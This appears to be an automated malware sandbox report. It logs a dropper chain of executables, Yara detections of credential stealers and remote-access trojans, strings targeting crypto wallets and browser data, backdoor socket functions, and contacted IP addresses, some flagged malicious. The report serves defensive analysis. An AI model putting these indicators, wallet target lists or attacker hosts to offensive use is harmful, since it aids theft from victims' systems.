Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe VolumeInformation
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Queries volume information: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe VolumeInformation
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Queries volume information: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_005F0030 GetLocalTime,__swprintf,

19_2_005F0030

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_005F0722 GetUserNameW,

19_2_005F0722

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_005E416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

19_2_005E416A

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe

Code function: 0_2_0040681B GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_0040681B

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 31.2.build2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.3.build2.exe.2b60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.build2.exe.2af0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.build2.exe.2af0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.3.build2.exe.2b60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000003.3728665099.0000000002B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.4175235264.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.4162638293.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000221001\exbuild.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\exbuild[1].exe, type: DROPPED

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: 3546345.exe PID: 7096, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match

File source: 00000027.00000002.3650886377.00000220BC200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 51.2.RegAsm.exe.482060.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.482060.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000033.00000002.3597562499.0000000000479000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: 43.2.GOLD.exe.3405570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.GOLD.exe.3405570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.436060.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.436060.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 46.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000033.00000002.3597562499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.3591044518.0000000003405000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000002.4554653259.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: GOLD.exe PID: 8036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 4204, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4500, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\WIDeqOfZq9.exe, type: DROPPED

Yara detected XWorm

Source: Yara match	File source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.0.IIZS2TRqf69aZbLAX3cf3edn.exe.bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002A.00000002.4703878971.0000000012DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000000.3476472138.0000000000BF2000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.4674057559.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: IIZS2TRqf69aZbLAX3cf3edn.exe PID: 5052, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\Windows.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 51.2.RegAsm.exe.482060.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.482060.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe, type: DROPPED

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 3546345.exe, 00000025.00000000.3386144333.00000000005AD000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: FAmazon Musicworkspace-storagelocalization-cacheJavaScriptdictionarieswebviewMcAfeeScreenPalF:G:brave.exempressCodeSteamCachedDatalinknowTechSmithMcAfee_IncReleasesWindows Server 2008 %wS.nuget.dotnetMetroJaxxOneNoteElectrumEdrawWarThunderOpera Software\Opera DeveloperBorisFXAppCenterInnovative SolutionsDewMobilemoedaData (Time): ...atomic\Local Storage\leveldbmonedaDawnCacheCode CachedatabasesCrashpadVisualStudioVaultSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000DriverDescHARDWARE\DESCRIPTION\System\CentralProcessor\0ProcessorNameStringDisplayNameSOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\UninstallDisplayVersionSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallfhilaheimglignddkjgofkcbgekhenbhfnjhmkhhmkbjkkabndcnnogagogbneec
Source: 3546345.exe, 00000025.00000000.3386144333.00000000005AD000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: YXFeedsSquirrelTempPublishersinkscapeLedger Live\114\Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)MultiBitHDTestertof_launcher\tbs_cache\NZXT CAM\CLR_v2.0_32EOS-Webcam-Utilitybit_flags & MZ_ZIP_LDH_BIT_FLAG_HAS_LOCATORcatsxp.exebitboxF12NitroPioneerXuanZhi9MaxonXuanZhiGPU: Riot Games\VisualStudio Servicesapp.json.updaterId.node-redOnDeviceHeadSuggestModelbefore_first_zip
Source: 3546345.exe, 00000025.00000000.3386144333.00000000005AD000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: YXFeedsSquirrelTempPublishersinkscapeLedger Live\114\Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)MultiBitHDTestertof_launcher\tbs_cache\NZXT CAM\CLR_v2.0_32EOS-Webcam-Utilitybit_flags & MZ_ZIP_LDH_BIT_FLAG_HAS_LOCATORcatsxp.exebitboxF12NitroPioneerXuanZhi9MaxonXuanZhiGPU: Riot Games\VisualStudio Servicesapp.json.updaterId.node-redOnDeviceHeadSuggestModelbefore_first_zip
Source: 3546345.exe, 00000025.00000000.3386144333.00000000005AD000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: Numpadcom.liberty.jaxxMovavijrelauncher-updaterMy projectGoogleUpdaterpreferencesPackageCache
Source: 3546345.exe, 00000025.00000000.3386144333.00000000005AD000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: YXFeedsSquirrelTempPublishersinkscapeLedger Live\114\Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)MultiBitHDTestertof_launcher\tbs_cache\NZXT CAM\CLR_v2.0_32EOS-Webcam-Utilitybit_flags & MZ_ZIP_LDH_BIT_FLAG_HAS_LOCATORcatsxp.exebitboxF12NitroPioneerXuanZhi9MaxonXuanZhiGPU: Riot Games\VisualStudio Servicesapp.json.updaterId.node-redOnDeviceHeadSuggestModelbefore_first_zip
Source: 3546345.exe, 00000025.00000000.3386144333.00000000005AD000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: Picasa2ZomboidBeamNG.drivediscordFACEITOS: 2SnapshotsFailed to get temp path\exodus.walletH:VirtualBox VMsBlenderGIMPBlender FoundationMendeley Reference ManageropcgpfmipidbgpenhmajoajpbobppdilDATAparkFoxit SoftwareJDownloaderMoises360TotalSecurityMEmu360safe
Source: 3546345.exe, 00000025.00000000.3386144333.00000000005AD000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: AWebView2Panasonictrxnot initializedinvalid entry nameentry not foundinvalid zip modeinvalid compression levelno zip 64 supportmemset errorcannot write data to entrycannot initialize tdefl compressorinvalid indexheader not foundcannot flush tdefl buffercannot write entry headercannot create entry headercannot write to central dircannot open fileinvalid entry typeextracting data using no memory allocationfile not foundno permissionout of memoryinvalid zip archive namemake dir errorsymlink errorclose archive errorcapacity size too smallfseek errorfread errorfwrite errorcannot initialize readercannot initialize writercannot initialize writer from readerstream endneed dictionaryfile errorstream errordata errorout of memorybuf errorversion errorparameter errorTempstoragesolConfigEthereum (UTC).next%d x %d/home/anal/bot/zip_include/zip.c(zip->entry.header_offset & (pzip->m_file_offset_alignment - 1)) == 0webcache2webcachetonphraseseedpipWind
Source: RegAsm.exe, 00000033.00000002.3597562499.0000000000479000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: set_UseMachineKeyStore

OS version to string mapping found (often used in BOTs)

Source: GuardTrack.scr	Binary or memory string: WIN_81
Source: GuardTrack.scr	Binary or memory string: WIN_XP
Source: GuardTrack.scr	Binary or memory string: WIN_XPe
Source: GuardTrack.scr	Binary or memory string: WIN_VISTA
Source: GuardTrack.scr	Binary or memory string: WIN_7
Source: GuardTrack.scr	Binary or memory string: WIN_8
Source: Scottish.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: 3546345.exe PID: 7096, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match

File source: 00000027.00000002.3650886377.00000220BC200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 51.2.RegAsm.exe.482060.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.482060.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000033.00000002.3597562499.0000000000479000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: 43.2.GOLD.exe.3405570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.GOLD.exe.3405570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.436060.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.436060.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 46.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000033.00000002.3597562499.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000002.3591044518.0000000003405000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002E.00000002.4554653259.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: GOLD.exe PID: 8036, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 4204, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4500, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\WIDeqOfZq9.exe, type: DROPPED

Yara detected XWorm

Source: Yara match	File source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 42.0.IIZS2TRqf69aZbLAX3cf3edn.exe.bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002A.00000002.4703878971.0000000012DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000000.3476472138.0000000000BF2000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.4674057559.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: IIZS2TRqf69aZbLAX3cf3edn.exe PID: 5052, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\Windows.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: 51.2.RegAsm.exe.482060.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 51.2.RegAsm.exe.482060.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe, type: DROPPED

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0062696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	19_2_0062696E
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_00626E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	19_2_00626E32
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_0043269B Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,	31_2_0043269B
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_004319A4 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	31_2_004319A4
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B22902 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,	31_2_02B22902
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B21C0B Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	31_2_02B21C0B

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
162.125.66.18	unknown	United States	19679	DROPBOXUS	false
185.215.113.26	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
185.215.113.19	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
103.130.147.211	unknown	Turkey	63859	MYREPUBLIC-AS-IDPTEkaMasRepublikID	false
45.200.149.147	unknown	Seychelles	328608	Africa-on-Cloud-ASZA	false
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
208.95.112.1	unknown	United States	53334	TUT-ASUS	false
95.179.163.21	unknown	Netherlands	20473	AS-CHOOPAUS	true
82.147.85.52	unknown	Russian Federation	31112	SIBTEL-ASRU	false
104.20.4.235	unknown	United States	13335	CLOUDFLARENETUS	false
185.216.214.225	unknown	Germany	205388	SERVERDISCOUNTERserverdiscountercomDE	false
193.176.158.185	unknown	unknown	207451	AGROSVITUA	true
188.114.96.3	unknown	European Union	13335	CLOUDFLARENETUS	false

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
